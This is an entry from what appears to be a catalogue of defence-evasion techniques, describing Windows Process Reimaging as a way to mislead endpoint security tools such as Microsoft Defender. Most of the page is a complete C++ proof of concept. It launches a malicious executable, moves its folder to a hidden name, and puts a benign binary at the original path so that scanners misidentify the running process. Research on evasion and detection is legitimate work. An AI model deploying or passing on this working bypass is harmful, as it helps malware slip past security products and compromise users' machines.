Process Reimaging

Created the Friday 08 May 2020. Updated 6 months, 1 week ago.

Process Reimaging is a technique used to evade detection by endpoint security solutions. It is a variation of the Process Hollowing or Process Doppelganging techniques, which are used to execute arbitrary code in the context of another process.

The Windows operating system has inconsistencies in how it determines the locations of process image FILE_OBJECTs, which can impact the ability of endpoint security solutions, such as Microsoft Defender Realtime Protection, to accurately detect the correct binaries loaded in malicious processes. This inconsistency can be exploited using the Process Reimaging technique, which does not require code injection.

Technique Identifier

U1210

Technique Tags

Process Reimaging Detection evasion Endpoint security solutions Process Hollowing Process Doppelganging Mitre Attack Defense Evasion Category Code injection

Code Snippets

/*
*  Use: process_reimaging.exe x:\xxx\bad.exe x:\xxx\white.exe
*/
#include <Windows.h>
#include <iostream>
#include <string>

const bool CGetCurrentDirectory(std::string& strDirpath)
{
	char szModule[1024] = { 0, };
	GetModuleFileNameA(NULL, szModule, sizeof(szModule) / sizeof(char));
	strDirpath = szModule;
	if (0 >= strDirpath.size())
	{
		OutputDebugString(L"GetModuleFileNameA Error");
		return 0;
	}
	size_t offset = strDirpath.rfind("\\");
	if (0 >= offset)
	{
		OutputDebugString(L"GetModuleFileNameA Size < 0");
		return 0;
	}
	strDirpath = strDirpath.substr(0, offset + 1);
	return true;
}

int main(int argc, char* argv[])
{
	if (argc < 3) {
		std::cout << "[-] Parameter Path Error..." << std::endl;
		return 0;
	}

	const std::string sBadExePath = argv[1];
	if (sBadExePath.empty()) {
		std::cout << "[-] Parameter badExe Path Error..." << std::endl;
		return 0;
	}

	const std::string sWhiteExePath = argv[2];
	if (sWhiteExePath.empty()) {
		std::cout << "[-] Parameter WhiteExe Path Error..." << std::endl;
		return 0;
	}

	// 1. create bad.exe directory && createprocess bad.exe
	std::string strCurrentDir = "";
	CGetCurrentDirectory(strCurrentDir);
	if (strCurrentDir.empty())
		strCurrentDir = "C:\\Windows\\";
	const std::string strBadOldDirPath = (strCurrentDir + "Bad").c_str();
	int res = CreateDirectoryA(strBadOldDirPath.c_str(), NULL);
	if ((res == 0) && !(GetLastError() == ERROR_ALREADY_EXISTS)) {
		std::cout << "[-] Error creating directory: " << strBadOldDirPath.c_str() << std::endl;
		return 0;
	}

	const std::string strBadExeFullPath = (strBadOldDirPath + "\\bad.exe").c_str();
	BOOL boolRes = CopyFileA(sBadExePath.c_str(), strBadExeFullPath.c_str(), FALSE);
	if (!boolRes) {
		std::cout << "[-] Could not copy " << sBadExePath << " to " << strBadExeFullPath << std::endl;
		return 0;
	}

	STARTUPINFOA si = { sizeof(si) };
	PROCESS_INFORMATION pi;
	res = CreateProcessA(NULL, (LPSTR)strBadExeFullPath.c_str(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
	if (res == 0) {
		DWORD err = GetLastError();
		std::cout << "[-] Error creating process: " << err << std::endl;
		return 0;
	}
	if (pi.hProcess) {
		CloseHandle(pi.hProcess);
	}
	if (pi.hThread) {
		CloseHandle(pi.hThread);
	}

	// 2. rename bad.exe directory path to new directory
	const std::string strNewBadDirFullPath = (strCurrentDir + ".Bad").c_str();
	boolRes = MoveFileA(strBadOldDirPath.c_str(), strNewBadDirFullPath.c_str());
	if (!boolRes) {
		DWORD err = GetLastError();
		std::cout << "[-] Failed to move file to hidden directory:" << err << std::endl;
		return 0;
	}

	// 3. create old bad.exe directory & copy  white.exe
	res = CreateDirectoryA(strBadOldDirPath.c_str(), NULL);
	if ((res == 0) && !(GetLastError() == ERROR_ALREADY_EXISTS)) {
		std::cout << "[-] Error creating directory: " << strBadOldDirPath.c_str() << std::endl;
		return 0;
	}

	boolRes = CopyFileA(sWhiteExePath.c_str(), strBadExeFullPath.c_str(), FALSE);
	if (!boolRes) {
		std::cout << "[-] Could not copy " << sBadExePath << " to " << strBadOldDirPath << std::endl;
		return 0;
	}
	return 0;
}

Additional Resources

External Links

The resources provided below are associated links that will give you even more detailed information and research on current evasion technique. It is important to note that, while these resources may be helpful, it is important to exercise caution when following external links. As always, be careful when clicking on links from unknown sources, as they may lead to malicious content.

In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass